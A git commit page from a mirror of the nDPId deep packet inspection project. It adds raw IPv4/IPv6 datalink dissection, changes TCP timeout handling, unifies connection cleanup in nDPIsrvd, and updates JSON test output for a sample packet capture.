scottk/nDPId
1
0
Fork 0
mirror of https://github.com/optim-enterprises-bv/nDPId.git synced 2025-10-30 01:42:22 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added proper DLT_RAW dissection for IPv4 and IPv6.

Browse Source 
* nDPId: Improved TCP timeout handling if FIN/RST seen
	  which caused Midstream TCP flows when there shouldn't be any.
 * nDPIsrvd: Unified remote descriptor resource cleanup on disconnects/shutdown.
 * nDPIsrvd: Added additional error messages for remote descriptors.
 * py-flow-info: Better daemon status message printing.

Signed-off-by: lns <matzeton@googlemail.com>
This commit is contained in:
lns
2022-04-24 15:42:28 +02:00
parent 9aeff586bd
commit 22a8d04c74
193 changed files with 27027 additions and 29471 deletions
Download Patch File Download Diff File Expand all files Collapse all files

26
examples/py-flow-info/flow-info.py
View File

@@ -262,19 +262,23 @@ def onJsonLineRecvd(json_dict, instance, current_flow, global_user_data):
if 'daemon_event_id' in json_dict:
if json_dict['daemon_event_name'] == 'status':
color = [TermColor.WARNING]
daemon_msg = '[Processed: {} pkts][ZLib][compressions: {}|diff: {} / {}][Flows][active: {} / {}|skipped: {}|!detected: {}' \
'|guessed: {}|detection-updates: {}|updates: {}]'.format(
json_dict['packets-processed'],
json_dict['total-compressions'], json_dict['current-compression-diff'], json_dict['total-compression-diff'],
json_dict['current-active-flows'], json_dict['total-active-flows'],
json_dict['total-skipped-flows'],
json_dict['total-not-detected-flows'], json_dict['total-guessed-flows'],
json_dict['total-detection-updates'], json_dict['total-updates'])
daemon_msg = list()
daemon_msg += ['[Processed: {} pkts][ZLib][compressions: {}|diff: {} / {}]'.format(
json_dict['packets-processed'],
json_dict['total-compressions'], json_dict['current-compression-diff'], json_dict['total-compression-diff'])]
daemon_msg += ['[Flows][active: {} / {}|skipped: {}|!detected: {}|guessed: {}|' \
'detection-updates: {}|updates: {}]'.format(
json_dict['current-active-flows'], json_dict['total-active-flows'],
json_dict['total-skipped-flows'],
json_dict['total-not-detected-flows'], json_dict['total-guessed-flows'],
json_dict['total-detection-updates'], json_dict['total-updates'])]
else:
color = [TermColor.WARNING, TermColor.BLINK]
daemon_msg = json_dict['daemon_event_name']
print('{}{}{} {}: {}'.format(timestamp, basic_daemon_event_prefix, instance_and_source,
prettifyEvent(color, 15, 'DAEMON-EVENT'), daemon_msg))
daemon_msg = list()
daemon_msg += [json_dict['daemon_event_name']]
for dm in daemon_msg:
print('{}{}{} {}: {}'.format(timestamp, basic_daemon_event_prefix, instance_and_source,
prettifyEvent(color, 15, 'DAEMON-EVENT'), dm))
stats.printStatus()
return True
if 'error_event_id' in json_dict:

2
nDPId-test.c
View File

@@ -872,7 +872,7 @@ int main(int argc, char ** argv)
nDPId_options.instance_alias = strdup("nDPId-test");
if (access(argv[1], R_OK) != 0)
{
logger_early(1, "%s: pcap file `%s' does not exist or is not readable", argv[0], argv[1]);
logger(1, "%s: pcap file `%s' does not exist or is not readable", argv[0], argv[1]);
return 1;
}
nDPId_options.pcap_file_or_interface = strdup(argv[1]);

89
nDPId.c
View File

@@ -108,8 +108,7 @@ struct nDPId_flow_basic
uint8_t l4_protocol;
uint8_t tcp_fin_rst_seen : 1;
uint8_t tcp_is_midstream_flow : 1;
uint8_t idled : 1;
uint8_t reserved_00 : 5;
uint8_t reserved_00 : 6;
uint8_t reserved_01[2];
uint16_t src_port;
uint16_t dst_port;
@@ -1430,15 +1429,33 @@ static uint64_t get_l4_protocol_idle_time(uint8_t l4_protocol)
}
}
static uint64_t get_l4_protocol_idle_time_external(uint8_t l4_protocol)
{
uint64_t idle_time = get_l4_protocol_idle_time(l4_protocol);
if (l4_protocol == IPPROTO_TCP)
{
idle_time += nDPId_options.tcp_max_post_end_flow_time;
}
return idle_time;
}
static int is_l4_protocol_timed_out(struct nDPId_workflow const * const workflow,
struct nDPId_flow_basic const * const flow_basic)
{
uint64_t sdiff = flow_basic->last_seen % nDPId_options.flow_scan_interval;
uint64_t itime = get_l4_protocol_idle_time(flow_basic->l4_protocol) - sdiff;
return (flow_basic->last_seen + itime <= workflow->last_thread_time) ||
return flow_basic->tcp_fin_rst_seen == 1 || flow_basic->last_seen + itime <= workflow->last_thread_time;
}
static int is_tcp_post_end(struct nDPId_workflow const * const workflow,
struct nDPId_flow_basic const * const flow_basic)
{
return flow_basic->l4_protocol != IPPROTO_TCP || flow_basic->tcp_fin_rst_seen == 0 ||
(flow_basic->tcp_fin_rst_seen == 1 &&
flow_basic->last_seen + nDPId_options.tcp_max_post_end_flow_time - sdiff <= workflow->last_thread_time);
flow_basic->last_seen + nDPId_options.tcp_max_post_end_flow_time <= workflow->last_thread_time);
}
static int is_flow_update_required(struct nDPId_workflow const * const workflow,
@@ -1447,11 +1464,6 @@ static int is_flow_update_required(struct nDPId_workflow const * const workflow,
uint64_t sdiff = flow_ext->flow_basic.last_seen % nDPId_options.flow_scan_interval;
uint64_t itime = get_l4_protocol_idle_time(flow_ext->flow_basic.l4_protocol) - sdiff;
if (flow_ext->flow_basic.idled != 0)
{
return 0;
}
return flow_ext->last_flow_update + itime <= workflow->last_thread_time;
}
@@ -1476,20 +1488,22 @@ static void ndpi_idle_scan_walker(void const * const A, ndpi_VISIT which, int de
{
if (is_l4_protocol_timed_out(workflow, flow_basic) != 0)
{
flow_basic->idled = 1;
workflow->ndpi_flows_idle[workflow->cur_idle_flows++] = flow_basic;
switch (flow_basic->state)
if (is_tcp_post_end(workflow, flow_basic) != 0)
{
case FS_UNKNOWN:
case FS_COUNT:
workflow->ndpi_flows_idle[workflow->cur_idle_flows++] = flow_basic;
switch (flow_basic->state)
{
case FS_UNKNOWN:
case FS_COUNT:
case FS_SKIPPED:
break;
case FS_SKIPPED:
break;
case FS_FINISHED:
case FS_INFO:
workflow->total_idle_flows++;
break;
case FS_FINISHED:
case FS_INFO:
workflow->total_idle_flows++;
break;
}
}
}
}
@@ -1886,7 +1900,7 @@ static void jsonize_flow(struct nDPId_workflow * const workflow, struct nDPId_fl
ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "flow_last_seen", flow_ext->flow_basic.last_seen);
ndpi_serialize_string_uint64(&workflow->ndpi_serializer,
"flow_idle_time",
get_l4_protocol_idle_time(flow_ext->flow_basic.l4_protocol));
get_l4_protocol_idle_time_external(flow_ext->flow_basic.l4_protocol));
ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "flow_min_l4_payload_len", flow_ext->min_l4_payload_len);
ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "flow_max_l4_payload_len", flow_ext->max_l4_payload_len);
ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "flow_tot_l4_payload_len", flow_ext->total_l4_payload_len);
@@ -2215,7 +2229,7 @@ static void jsonize_packet_event(struct nDPId_reader_thread * const reader_threa
ndpi_serialize_string_uint64(&workflow->ndpi_serializer, "flow_last_seen", flow_ext->flow_basic.last_seen);
ndpi_serialize_string_uint64(&workflow->ndpi_serializer,
"flow_idle_time",
get_l4_protocol_idle_time(flow_ext->flow_basic.l4_protocol));
get_l4_protocol_idle_time_external(flow_ext->flow_basic.l4_protocol));
}
char base64_data[NETWORK_BUFFER_MAX_SIZE];
@@ -2715,7 +2729,7 @@ static int process_datalink_layer(struct nDPId_reader_thread * const reader_thre
return 1;
}
struct ndpi_chdlc const * const chdlc = (struct ndpi_chdlc const * const) & packet[eth_offset];
struct ndpi_chdlc const * const chdlc = (struct ndpi_chdlc const * const)&packet[eth_offset];
*ip_offset = sizeof(struct ndpi_chdlc);
*layer3_type = ntohs(chdlc->proto_code);
break;
@@ -2737,7 +2751,7 @@ static int process_datalink_layer(struct nDPId_reader_thread * const reader_thre
if (packet[0] == 0x0f || packet[0] == 0x8f)
{
struct ndpi_chdlc const * const chdlc = (struct ndpi_chdlc const * const) & packet[eth_offset];
struct ndpi_chdlc const * const chdlc = (struct ndpi_chdlc const * const)&packet[eth_offset];
*ip_offset = sizeof(struct ndpi_chdlc); /* CHDLC_OFF = 4 */
*layer3_type = ntohs(chdlc->proto_code);
}
@@ -2775,7 +2789,7 @@ static int process_datalink_layer(struct nDPId_reader_thread * const reader_thre
}
struct ndpi_radiotap_header const * const radiotap =
(struct ndpi_radiotap_header const * const) & packet[eth_offset];
(struct ndpi_radiotap_header const * const)&packet[eth_offset];
uint16_t radio_len = radiotap->len;
/* Check Bad FCS presence */
@@ -2837,9 +2851,23 @@ static int process_datalink_layer(struct nDPId_reader_thread * const reader_thre
break;
}
case DLT_RAW:
jsonize_error_eventf(reader_thread, UNSUPPORTED_DATALINK_LAYER, NULL);
jsonize_packet_event(reader_thread, header, packet, 0, 0, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
return 1;
*ip_offset = 0;
if (header->caplen < 1)
{
return 1;
}
switch ((packet[0] & 0xF0) >> 4)
{
case 4:
*layer3_type = ETH_P_IP;
break;
case 6:
*layer3_type = ETH_P_IPV6;
break;
default:
return 1;
}
break;
case DLT_EN10MB:
if (header->caplen < sizeof(struct ndpi_ethhdr))
{
@@ -3723,7 +3751,7 @@ static void ndpi_log_flow_walker(void const * const A, ndpi_VISIT which, int dep
struct nDPId_flow_finished const * const flow_fin = (struct nDPId_flow_finished *)flow_basic;
uint64_t last_seen = flow_fin->flow_extended.flow_basic.last_seen;
uint64_t idle_time = get_l4_protocol_idle_time(flow_fin->flow_extended.flow_basic.l4_protocol);
uint64_t idle_time = get_l4_protocol_idle_time_external(flow_fin->flow_extended.flow_basic.l4_protocol);
logger(0,
"[%2zu][%4llu][last-seen: %13llu][last-update: %13llu][idle-time: %7llu][time-until-timeout: "
"%7llu]",
@@ -3743,7 +3771,8 @@ static void ndpi_log_flow_walker(void const * const A, ndpi_VISIT which, int dep
struct nDPId_flow_info const * const flow_info = (struct nDPId_flow_info *)flow_basic;
uint64_t last_seen = flow_info->flow_extended.flow_basic.last_seen;
uint64_t idle_time = get_l4_protocol_idle_time(flow_info->flow_extended.flow_basic.l4_protocol);
uint64_t idle_time =
get_l4_protocol_idle_time_external(flow_info->flow_extended.flow_basic.l4_protocol);
logger(0,
"[%2zu][%4llu][last-seen: %13llu][last-update: %13llu][idle-time: %7llu][time-until-timeout: "
"%7llu]",

134
nDPIsrvd.c
View File

@@ -108,6 +108,7 @@ static int fcntl_add_flags(int fd, int flags);
static int fcntl_del_flags(int fd, int flags);
static int add_in_event_fd(int epollfd, int fd);
static int add_in_event(int epollfd, struct remote_desc * const remote);
static int del_event(int epollfd, int fd);
static int del_out_event(int epollfd, struct remote_desc * const remote);
static void disconnect_client(int epollfd, struct remote_desc * const current);
static int drain_write_buffers_blocking(struct remote_desc * const remote);
@@ -120,6 +121,7 @@ static void nDPIsrvd_buffer_array_copy(void * dst, const void * src)
buf_dst->buf.ptr.raw = NULL;
if (nDPIsrvd_buffer_init(&buf_dst->buf, buf_src->buf.used) != 0)
{
logger(1, "Additional write buffer init failed, size: %zu bytes", buf_src->buf.used);
return;
}
@@ -590,6 +592,7 @@ static struct remote_desc * get_remote_descriptor(enum sock_type type, int remot
{
if (remotes.desc_used == remotes.desc_size)
{
logger(1, "Max number of connections reached: %llu", remotes.desc_used);
return NULL;
}
@@ -608,6 +611,7 @@ static struct remote_desc * get_remote_descriptor(enum sock_type type, int remot
if (nDPIsrvd_json_buffer_init(&remotes.desc[i].event_collector_un.main_read_buffer,
max_buffer_size) != 0)
{
logger(1, "Read/JSON buffer init failed, size: %zu bytes", max_buffer_size);
return NULL;
}
break;
@@ -626,11 +630,13 @@ static struct remote_desc * get_remote_descriptor(enum sock_type type, int remot
utarray_new(*additional_write_buffers, &nDPIsrvd_buffer_array_icd);
if (*additional_write_buffers == NULL)
{
logger(1, "%s", "Could not create additional write buffers");
return NULL;
}
}
if (write_buffer != NULL && nDPIsrvd_buffer_init(&write_buffer->buf, max_buffer_size) != 0)
{
logger(1, "Write buffer init failed, size: %zu bytes", max_buffer_size);
return NULL;
}
@@ -640,35 +646,71 @@ static struct remote_desc * get_remote_descriptor(enum sock_type type, int remot
}
}
logger(1, "%s", "BUG: Unknown error while finding the remote descriptor");
return NULL;
}
static void free_remotes(void)
static void free_remote(int epollfd, struct remote_desc * remote)
{
if (remote->fd > -1)
{
errno = 0;
del_event(epollfd, remote->fd);
if (errno != 0)
{
logger_nDPIsrvd(remote, "Could not delete event from epoll for connection", ": %s", strerror(errno));
}
errno = 0;
close(remote->fd);
switch (remote->sock_type)
{
case COLLECTOR_UN:
if (errno != 0)
{
logger_nDPIsrvd(remote, "Error closing collector connection", ": %s", strerror(errno));
}
nDPIsrvd_json_buffer_free(&remote->event_collector_un.main_read_buffer);
break;
case DISTRIBUTOR_UN:
if (errno != 0)
{
logger_nDPIsrvd(remote, "Error closing distributor connection", ": %s", strerror(errno));
}
if (remote->event_distributor_un.additional_write_buffers != NULL)
{
utarray_clear(remote->event_distributor_un.additional_write_buffers);
}
nDPIsrvd_buffer_free(&remote->event_distributor_un.main_write_buffer.buf);
remote->event_distributor_un.main_write_buffer.written = 0;
free(remote->event_distributor_un.user_name);
remote->event_distributor_un.user_name = NULL;
break;
case DISTRIBUTOR_IN:
if (errno != 0)
{
logger_nDPIsrvd(remote, "Error closing distributor connection", ": %s", strerror(errno));
}
if (remote->event_distributor_in.additional_write_buffers != NULL)
{
utarray_clear(remote->event_distributor_in.additional_write_buffers);
}
nDPIsrvd_buffer_free(&remote->event_distributor_in.main_write_buffer.buf);
remote->event_distributor_in.main_write_buffer.written = 0;
break;
}
remote->fd = -1;
remotes.desc_used--;
}
}
static void free_remotes(int epollfd)
{
for (size_t i = 0; i < remotes.desc_size; ++i)
{
switch (remotes.desc[i].sock_type)
{
case COLLECTOR_UN:
nDPIsrvd_json_buffer_free(&remotes.desc[i].event_collector_un.main_read_buffer);
break;
case DISTRIBUTOR_UN:
if (remotes.desc[i].event_distributor_un.additional_write_buffers != NULL)
{
utarray_free(remotes.desc[i].event_distributor_un.additional_write_buffers);
remotes.desc[i].event_distributor_un.additional_write_buffers = NULL;
}
nDPIsrvd_buffer_free(&remotes.desc[i].event_distributor_un.main_write_buffer.buf);
break;
case DISTRIBUTOR_IN:
if (remotes.desc[i].event_distributor_in.additional_write_buffers != NULL)
{
utarray_free(remotes.desc[i].event_distributor_in.additional_write_buffers);
remotes.desc[i].event_distributor_in.additional_write_buffers = NULL;
}
nDPIsrvd_buffer_free(&remotes.desc[i].event_distributor_in.main_write_buffer.buf);
break;
}
free_remote(epollfd, &remotes.desc[i]);
}
}
@@ -724,47 +766,9 @@ static int del_event(int epollfd, int fd)
return epoll_ctl(epollfd, EPOLL_CTL_DEL, fd, NULL);
}
static void disconnect_client(int epollfd, struct remote_desc * const current)
static void disconnect_client(int epollfd, struct remote_desc * const remote)
{
if (current->fd > -1)
{
del_event(epollfd, current->fd);
if (close(current->fd) != 0)
{
switch (current->sock_type)
{
case COLLECTOR_UN:
logger_nDPIsrvd(current, "Error closing collector connection", ": %s", strerror(errno));
nDPIsrvd_json_buffer_free(&current->event_collector_un.main_read_buffer);
break;
case DISTRIBUTOR_UN:
logger_nDPIsrvd(current, "Error closing distributor connection", ": %s", strerror(errno));
if (current->event_distributor_un.additional_write_buffers != NULL)
{
utarray_clear(current->event_distributor_un.additional_write_buffers);
}
nDPIsrvd_buffer_free(&current->event_distributor_un.main_write_buffer.buf);
current->event_distributor_un.main_write_buffer.written = 0;
break;
case DISTRIBUTOR_IN:
logger_nDPIsrvd(current, "Error closing distributor connection", ": %s", strerror(errno));
if (current->event_distributor_in.additional_write_buffers != NULL)
{
utarray_clear(current->event_distributor_in.additional_write_buffers);
}
nDPIsrvd_buffer_free(&current->event_distributor_in.main_write_buffer.buf);
current->event_distributor_in.main_write_buffer.written = 0;
break;
}
}
if (current->sock_type == DISTRIBUTOR_UN)
{
free(current->event_distributor_un.user_name);
current->event_distributor_un.user_name = NULL;
}
current->fd = -1;
remotes.desc_used--;
}
free_remote(epollfd, remote);
}
static int nDPIsrvd_parse_options(int argc, char ** argv)
@@ -914,7 +918,6 @@ static struct remote_desc * accept_remote(int server_fd,
struct remote_desc * current = get_remote_descriptor(socktype, client_fd, NETWORK_BUFFER_MAX_SIZE);
if (current == NULL)
{
logger(1, "Max number of connections reached: %llu", remotes.desc_used);
return NULL;
}
@@ -1433,8 +1436,7 @@ static int mainloop(int epollfd)
}
close(signalfd);
free_remotes();
free_remotes(epollfd);
return 0;
}

366
test/results/1kxun.pcap.out
View File

@@ -13,8 +13,8 @@
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1470104373741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104373741,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNKS5AgEGAMCRIFIAAIAAwKgFJMCoBSTAqHcBAAAAAAAmWsJjVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"}
00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRIAAAQRv2HAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
@@ -49,11 +49,11 @@
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1470104377734,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="}
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1470104377753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1470104377753,"pkt":"ABxCjnAxTF4M6gNlCABFAABinjgAAC4RqpIICAgIwKhzCAA1x1AATmX5\/SyBgAABAAIAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAHADAABAAEAAAErAARquSNuwAwAAQABAAABKwAEarkjcA=="}
00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
